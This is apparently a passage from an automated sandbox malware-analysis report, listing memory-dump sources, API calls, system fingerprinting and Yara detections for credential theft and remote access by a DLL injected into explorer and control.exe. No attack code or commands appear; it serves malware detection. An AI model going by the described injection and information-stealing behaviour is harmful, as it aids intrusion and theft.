0000001A.00000000.509648591.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.472519090.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.446594195.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.484290615.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.483172538.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.474448152.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B474AD cpuid 1_2_04B474AD
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3DB44 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_04B3DB44
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B39677 GetSystemTimeAsFileTime,HeapFree, 1_2_04B39677
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B495CA GetVersionExA,wsprintfA, 1_2_04B495CA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B44560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_04B44560

Stealing of Sensitive Information

Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR